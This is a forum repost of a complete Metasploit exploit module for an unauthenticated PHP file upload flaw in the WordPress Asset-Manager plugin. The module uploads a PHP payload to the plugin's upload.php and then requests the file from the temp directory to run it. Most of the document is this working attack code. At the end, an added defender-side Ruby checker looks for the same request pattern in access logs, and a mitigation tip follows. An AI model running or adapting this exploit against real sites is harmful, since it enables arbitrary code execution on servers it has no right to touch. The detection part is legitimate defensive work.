中国网络渗透测试联盟
Title:
WordPress Asset-Manager PHP File Upload Vulnerability
Author:
admin
Date:
2012-12-31 09:22
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP file uploads: a user can upload a file to a temp directory without any authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the file from the "Filedata" field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    # Step 1: POST the file to the plugin's unauthenticated upload handler.
    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Step 2: request the uploaded file from the temp directory so the web server executes it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
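As an added illustration from the defender's side (this is not part of the original post or of the Metasploit module), the Ruby checker below scans web-server access-log lines for the request pattern the module produces: a POST to asset-manager/upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp/ from the same client. The log lines, client addresses and file name are constructed samples.

```ruby
# Added example, not from the original post: flag the upload-then-execute pattern
# of the Asset-Manager upload.php weakness in Apache combined-format access logs.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

# Parse one access-log line into a hash, or return nil if it is not in the expected format.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Return [kind, client_ip, path] alerts. Any POST to upload.php is reported as an
# upload attempt; a later GET of a PHP file in the temp directory is reported as
# execution of an uploaded file when the same client posted earlier, otherwise as
# a plain request for PHP in the temp directory (still worth a look).
def detect_asset_manager_abuse(lines)
  alerts = []
  uploaders = {}
  lines.each do |line|
    e = parse_line(line)
    next unless e
    if e[:method] == "POST" && e[:path] =~ UPLOAD_PATH
      uploaders[e[:ip]] = true
      alerts << [:upload_attempt, e[:ip], e[:path]]
    elsif e[:method] == "GET" && e[:path] =~ TEMP_PHP
      kind = uploaders[e[:ip]] ? :uploaded_php_executed : :temp_php_request
      alerts << [kind, e[:ip], e[:path]]
    end
  end
  alerts
end

# Constructed sample log: one client uploads and then fetches the file, a second
# client only fetches it.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [26/May/2012:10:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.5 - - [26/May/2012:10:01:09 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
  203.0.113.5 - - [26/May/2012:10:01:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/AbCdE.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.7 - - [26/May/2012:10:02:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/AbCdE.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
LOG

if __FILE__ == $0
  detect_asset_manager_abuse(SAMPLE_LOG.lines).each { |kind, ip, path| puts "#{kind}: #{ip} #{path}" }
end
```

Blocking PHP execution under wp-content/uploads at the web server removes the second step entirely; the checker then still reports the upload attempts.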